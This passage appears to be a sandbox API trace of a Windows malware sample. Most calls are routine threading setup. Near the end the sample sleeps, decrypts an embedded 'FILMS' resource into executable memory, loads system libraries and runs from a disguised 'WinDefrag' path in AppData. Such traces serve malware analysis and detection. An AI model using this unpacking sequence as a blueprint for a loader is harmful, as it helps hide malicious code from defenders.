(lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.523] AddAtomA (lpString="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAaAAaAaaaaaAAAAAAaAAaa") returned 0xc002 [0129.523] GetAtomNameA (in: nAtom=0xc002, lpBuffer=0x28fcec, nSize=65 | out: lpBuffer="gcc-shmem-tdm2-once_global_shmem-aaaaaaaaaaAaAAaAaaaaaAAAAAAaAAa") returned 0x40 [0129.523] ReleaseMutex (hMutex=0x2c) returned 1 [0129.523] CloseHandle (hObject=0x2c) returned 1 [0129.523] strlen (_Str="once_obj_shmem") returned 0xe [0129.523] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-once_obj_shmem") returned 0x2c [0129.523] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0129.523] FindAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.523] AddAtomA (lpString="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAaAAaAaaaaaAAAAAAAAaaa") returned 0xc003 [0129.524] GetAtomNameA (in: nAtom=0xc003, lpBuffer=0x28fcfc, nSize=62 | out: lpBuffer="gcc-shmem-tdm2-once_obj_shmem-aaaaaaaaaaAaAAaAaaaaaAAAAAAAAaa") returned 0x3d [0129.524] ReleaseMutex (hMutex=0x2c) returned 1 [0129.524] CloseHandle (hObject=0x2c) returned 1 [0129.524] calloc (_Count=0x1, _Size=0x10) returned 0x5a1000 [0129.524] strlen (_Str="mutex_global_shmem") returned 0x12 [0129.524] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_shmem") returned 0x2c [0129.524] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0129.524] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.524] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaaaaAAaa") returned 0xc004 [0129.524] GetAtomNameA (in: nAtom=0xc004, lpBuffer=0x28fc9c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaaaaAAa") returned 0x41 [0129.524] ReleaseMutex (hMutex=0x2c) returned 1 [0129.524] CloseHandle (hObject=0x2c) returned 1 [0129.525] calloc (_Count=0x1, _Size=0x1c) returned 0x5a1030 [0129.525] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x2c [0129.525] WaitForSingleObject (hHandle=0x2c, dwMilliseconds=0xffffffff) returned 0x0 [0129.525] GetCurrentThreadId () returned 0x24c [0129.525] strlen (_Str="_pthread_tls_once_shmem") returned 0x17 [0129.525] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_once_shmem") returned 0x30 [0129.525] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0129.525] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.525] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaaAaAAaa") returned 0xc005 [0129.525] GetAtomNameA (in: nAtom=0xc005, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_once_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaaAaAAa") returned 0x46 [0129.525] ReleaseMutex (hMutex=0x30) returned 1 [0129.525] CloseHandle (hObject=0x30) returned 1 [0129.525] calloc (_Count=0x1, _Size=0x10) returned 0x5a1068 [0129.525] calloc (_Count=0x1, _Size=0x1c) returned 0x5a1080 [0129.525] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x30 [0129.525] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0129.525] GetCurrentThreadId () returned 0x24c [0129.525] strlen (_Str="_pthread_tls_shmem") returned 0x12 [0129.525] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_tls_shmem") returned 0x34 [0129.526] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0129.526] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.526] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaAaAaAaa") returned 0xc006 [0129.526] GetAtomNameA (in: nAtom=0xc006, lpBuffer=0x28fc7c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaAaAaAa") returned 0x41 [0129.526] ReleaseMutex (hMutex=0x34) returned 1 [0129.526] CloseHandle (hObject=0x34) returned 1 [0129.526] ReleaseSemaphore (in: hSemaphore=0x30, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0129.526] CloseHandle (hObject=0x30) returned 1 [0129.526] strlen (_Str="mtx_pthr_locked_shmem") returned 0x15 [0129.526] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mtx_pthr_locked_shmem") returned 0x30 [0129.526] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0129.526] FindAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.526] AddAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaaAAaAaa") returned 0xc007 [0129.526] GetAtomNameA (in: nAtom=0xc007, lpBuffer=0x28fc9c, nSize=69 | out: lpBuffer="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaaAAaAa") returned 0x44 [0129.526] ReleaseMutex (hMutex=0x30) returned 1 [0129.526] CloseHandle (hObject=0x30) returned 1 [0129.526] strlen (_Str="mutex_global_static_shmem") returned 0x19 [0129.526] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_static_shmem") returned 0x30 [0129.526] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0129.526] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.526] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaaAAAAaa") returned 0xc008 [0129.527] GetAtomNameA (in: nAtom=0xc008, lpBuffer=0x28fc2c, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaaAAAAa") returned 0x48 [0129.527] ReleaseMutex (hMutex=0x30) returned 1 [0129.527] CloseHandle (hObject=0x30) returned 1 [0129.527] strlen (_Str="mxattr_recursive_shmem") returned 0x16 [0129.527] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mxattr_recursive_shmem") returned 0x30 [0129.527] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0129.527] FindAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.527] AddAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaAaaAaaa") returned 0xc009 [0129.527] GetAtomNameA (in: nAtom=0xc009, lpBuffer=0x28fc2c, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaAaaAaa") returned 0x45 [0129.527] ReleaseMutex (hMutex=0x30) returned 1 [0129.527] CloseHandle (hObject=0x30) returned 1 [0129.527] calloc (_Count=0x1, _Size=0x1c) returned 0x5a10b8 [0129.527] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x30 [0129.527] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0129.527] GetCurrentThreadId () returned 0x24c [0129.527] strlen (_Str="pthr_root_shmem") returned 0xf [0129.527] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-pthr_root_shmem") returned 0x34 [0129.527] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0129.527] FindAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.527] AddAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaAAAaaaa") returned 0xc00a [0129.527] GetAtomNameA (in: nAtom=0xc00a, lpBuffer=0x28fcac, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAaAAaAaaaaAaaaaAAAaaa") returned 0x3e [0129.527] ReleaseMutex (hMutex=0x34) returned 1 [0129.527] CloseHandle (hObject=0x34) returned 1 [0129.527] calloc (_Count=0x1, _Size=0xc0) returned 0x5a10f0 [0129.528] strlen (_Str="idListCnt_shmem") returned 0xf [0129.528] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListCnt_shmem") returned 0x34 [0129.528] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0129.528] FindAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.528] AddAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAaAAaAaaaaAaaaAAaAAAaa") returned 0xc00b [0129.528] GetAtomNameA (in: nAtom=0xc00b, lpBuffer=0x28fc7c, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAaAAaAaaaaAaaaAAaAAAa") returned 0x3e [0129.528] ReleaseMutex (hMutex=0x34) returned 1 [0129.528] CloseHandle (hObject=0x34) returned 1 [0129.528] strlen (_Str="idListMax_shmem") returned 0xf [0129.528] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListMax_shmem") returned 0x34 [0129.528] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0129.528] FindAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.528] AddAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAaAAaAaaaaAaaaAAAaaAaa") returned 0xc00c [0129.528] GetAtomNameA (in: nAtom=0xc00c, lpBuffer=0x28fc7c, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAaAAaAaaaaAaaaAAAaaAa") returned 0x3e [0129.528] ReleaseMutex (hMutex=0x34) returned 1 [0129.528] CloseHandle (hObject=0x34) returned 1 [0129.528] strlen (_Str="idList_shmem") returned 0xc [0129.528] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idList_shmem") returned 0x34 [0129.528] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0129.528] FindAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.528] AddAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAaAAaAaaaaAaaAaaAAaaaa") returned 0xc00d [0129.528] GetAtomNameA (in: nAtom=0xc00d, lpBuffer=0x28fc7c, nSize=60 | out: lpBuffer="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAaAAaAaaaaAaaAaaAAaaa") returned 0x3b [0129.528] ReleaseMutex (hMutex=0x34) returned 1 [0129.528] CloseHandle (hObject=0x34) returned 1 [0129.529] strlen (_Str="idListNextId_shmem") returned 0x12 [0129.529] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListNextId_shmem") returned 0x34 [0129.529] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0129.529] FindAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.529] AddAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAaAAaAaaaaAaaAaaAAAaaa") returned 0xc00e [0129.529] GetAtomNameA (in: nAtom=0xc00e, lpBuffer=0x28fc6c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAaAAaAaaaaAaaAaaAAAaa") returned 0x41 [0129.529] ReleaseMutex (hMutex=0x34) returned 1 [0129.529] CloseHandle (hObject=0x34) returned 1 [0129.529] GetCurrentThreadId () returned 0x24c [0129.529] ReleaseSemaphore (in: hSemaphore=0x30, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0129.529] GetCurrentThreadId () returned 0x24c [0129.529] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34 [0129.529] GetCurrentProcess () returned 0xffffffff [0129.529] GetCurrentThread () returned 0xfffffffe [0129.529] GetCurrentProcess () returned 0xffffffff [0129.529] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a1104, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a1104*=0x38) returned 1 [0129.529] GetThreadPriority (hThread=0x38) returned 0 [0129.529] strlen (_Str="fc_key") returned 0x6 [0129.529] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-fc_key") returned 0x3c [0129.529] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0129.529] FindAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.529] AddAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAaAAaAaaaaAaaAaAaaaaaa") returned 0xc00f [0129.529] GetAtomNameA (in: nAtom=0xc00f, lpBuffer=0x28fcfc, nSize=55 | out: lpBuffer="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAaAAaAaaaaAaaAaAaaaaaa") returned 0x36 [0129.529] ReleaseMutex (hMutex=0x3c) returned 1 [0129.529] CloseHandle (hObject=0x3c) returned 1 [0129.530] strlen (_Str="_pthread_key_lock_shmem") returned 0x17 [0129.530] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_lock_shmem") returned 0x3c [0129.530] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0129.530] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.530] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAaAAaAaaaaAaaAaAaaAaaa") returned 0xc010 [0129.530] GetAtomNameA (in: nAtom=0xc010, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAaAAaAaaaaAaaAaAaaAaa") returned 0x46 [0129.530] ReleaseMutex (hMutex=0x3c) returned 1 [0129.530] CloseHandle (hObject=0x3c) returned 1 [0129.530] strlen (_Str="_pthread_cancelling_shmem") returned 0x19 [0129.530] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_cancelling_shmem") returned 0x3c [0129.530] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0129.530] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.530] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAaAAaAaaaaAaaAaAaAaaaa") returned 0xc011 [0129.530] GetAtomNameA (in: nAtom=0xc011, lpBuffer=0x28fc5c, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAaAAaAaaaaAaaAaAaAaaa") returned 0x48 [0129.530] ReleaseMutex (hMutex=0x3c) returned 1 [0129.530] CloseHandle (hObject=0x3c) returned 1 [0129.530] strlen (_Str="cond_locked_shmem_rwlock") returned 0x18 [0129.530] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-cond_locked_shmem_rwlock") returned 0x3c [0129.531] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0129.531] FindAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.531] AddAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAaAAaAaaaaAaaAaAaAAaaa") returned 0xc012 [0129.531] GetAtomNameA (in: nAtom=0xc012, lpBuffer=0x28fc3c, nSize=72 | out: lpBuffer="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAaAAaAaaaaAaaAaAaAAaa") returned 0x47 [0129.531] ReleaseMutex (hMutex=0x3c) returned 1 [0129.531] CloseHandle (hObject=0x3c) returned 1 [0129.531] calloc (_Count=0x1, _Size=0x20) returned 0x5a12c8 [0129.531] calloc (_Count=0x1, _Size=0x1c) returned 0x5a12f0 [0129.531] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x3c [0129.531] calloc (_Count=0x1, _Size=0x1c) returned 0x5a1318 [0129.531] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x40 [0129.531] calloc (_Count=0x1, _Size=0x6c) returned 0x5a1340 [0129.531] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x44 [0129.531] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x48 [0129.531] strlen (_Str="rwl_global_shmem") returned 0x10 [0129.531] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-rwl_global_shmem") returned 0x4c [0129.531] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0129.531] FindAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.531] AddAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAaAAaAaaaAaaAaaaAAAaaa") returned 0xc013 [0129.531] GetAtomNameA (in: nAtom=0xc013, lpBuffer=0x28fc5c, nSize=64 | out: lpBuffer="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAaAAaAaaaAaaAaaaAAAaa") returned 0x3f [0129.531] ReleaseMutex (hMutex=0x4c) returned 1 [0129.531] CloseHandle (hObject=0x4c) returned 1 [0129.531] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0129.531] GetCurrentThreadId () returned 0x24c [0129.531] WaitForSingleObject (hHandle=0x40, dwMilliseconds=0xffffffff) returned 0x0 [0129.532] GetCurrentThreadId () returned 0x24c [0129.532] strlen (_Str="_pthread_key_sch_shmem") returned 0x16 [0129.532] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_sch_shmem") returned 0x4c [0129.532] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0129.532] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.532] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAaAAaAaaaaAaaAAAaAAAaa") returned 0xc014 [0129.532] GetAtomNameA (in: nAtom=0xc014, lpBuffer=0x28fcbc, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAaAAaAaaaaAaaAAAaAAAa") returned 0x45 [0129.532] ReleaseMutex (hMutex=0x4c) returned 1 [0129.532] CloseHandle (hObject=0x4c) returned 1 [0129.532] strlen (_Str="_pthread_key_max_shmem") returned 0x16 [0129.532] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_max_shmem") returned 0x4c [0129.532] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0129.532] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.532] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAaAAaAaAAaaAAaaAAAAaaa") returned 0xc015 [0129.532] GetAtomNameA (in: nAtom=0xc015, lpBuffer=0x28fcbc, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAaAAaAaAAaaAAaaAAAAaa") returned 0x45 [0129.532] ReleaseMutex (hMutex=0x4c) returned 1 [0129.533] CloseHandle (hObject=0x4c) returned 1 [0129.533] strlen (_Str="_pthread_key_dest_shmem") returned 0x17 [0129.533] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_dest_shmem") returned 0x4c [0129.533] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0129.533] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0129.533] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAaAAaAaAAaaAAaAaaaAAaa") returned 0xc016 [0129.533] GetAtomNameA (in: nAtom=0xc016, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAaAAaAaAAaaAAaAaaaAAa") returned 0x46 [0129.533] ReleaseMutex (hMutex=0x4c) returned 1 [0129.533] CloseHandle (hObject=0x4c) returned 1 [0129.533] ReleaseSemaphore (in: hSemaphore=0x40, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0129.533] ReleaseSemaphore (in: hSemaphore=0x3c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0129.533] ReleaseSemaphore (in: hSemaphore=0x2c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0129.533] CloseHandle (hObject=0x2c) returned 1 [0129.533] GetLastError () returned 0x0 [0129.533] SetLastError (dwErrCode=0x0) [0129.533] GetLastError () returned 0x0 [0129.533] SetLastError (dwErrCode=0x0) [0129.533] Sleep (dwMilliseconds=0x3a98) [0139.537] FindResourceA (hModule=0x0, lpName=0x65, lpType="FILMS") returned 0x423190 [0139.539] LoadResource (hModule=0x0, hResInfo=0x423190) returned 0x42322c [0139.539] SizeofResource (hModule=0x0, hResInfo=0x423190) returned 0x3e400 [0139.540] LockResource (hResData=0x42322c) returned 0x42322c [0139.548] strlen (_Str="G1s,Ny%%ZjbEFWUaS5hW") returned 0x14 [0139.548] strlen (_Str="G1s,Ny%%ZjbEFWUaS5hW") returned 0x14 [0139.548] VirtualAlloc (lpAddress=0x0, dwSize=0xe4f, flAllocationType=0x1000, flProtect=0x40) returned 0x310000 [0139.548] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76490000 [0139.560] GetProcAddress (hModule=0x76490000, lpProcName="CryptAcquireContextA") returned 0x764991dd [0139.560] GetProcAddress (hModule=0x76490000, lpProcName="CryptImportKey") returned 0x7649c532 [0139.560] GetProcAddress (hModule=0x76490000, lpProcName="CryptEncrypt") returned 0x764b779b [0139.560] CryptAcquireContextA (in: phProv=0x28fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x28fde8*=0x9036d0) returned 1 [0139.774] CryptImportKey (in: hProv=0x9036d0, pbData=0x28fc14, dwDataLen=0x134, hPubKey=0x0, dwFlags=0x0, phKey=0x28fc00 | out: phKey=0x28fc00*=0x907198) returned 1 [0139.779] CryptImportKey (in: hProv=0x9036d0, pbData=0x28fd60, dwDataLen=0x4c, hPubKey=0x907198, dwFlags=0x0, phKey=0x28fbfc | out: phKey=0x28fbfc*=0x913cc0) returned 1 [0139.779] CryptEncrypt (in: hKey=0x913cc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x490048*, pdwDataLen=0x28fe74*=0x3e400, dwBufLen=0x3e400 | out: pbData=0x490048*, pdwDataLen=0x28fe74*=0x3e400) returned 1 [0139.779] VirtualAlloc (lpAddress=0x0, dwSize=0x2b4, flAllocationType=0x1000, flProtect=0x40) returned 0x380000 [0139.780] GetLastError () returned 0x3f0 [0139.780] SetLastError (dwErrCode=0x3f0) [0139.780] GetLastError () returned 0x3f0 [0139.780] SetLastError (dwErrCode=0x3f0) [0139.780] _findfirst (param_1="KLVBE.bin", param_2=0x28fce4) returned 0xffffffff [0139.780] GetLastError () returned 0x2 [0139.780] SetLastError (dwErrCode=0x2) [0139.781] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x40) returned 0x390000 [0139.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x76b00000 [0139.837] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77e20000 [0139.840] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x75c60000 [0139.841] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76490000 [0139.843] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75cf0000 [0139.846] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.846] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.846] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.846] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.846] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.846] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.846] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.846] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.846] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe\" " [0139.847] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0139.847] GetCommandLineW () 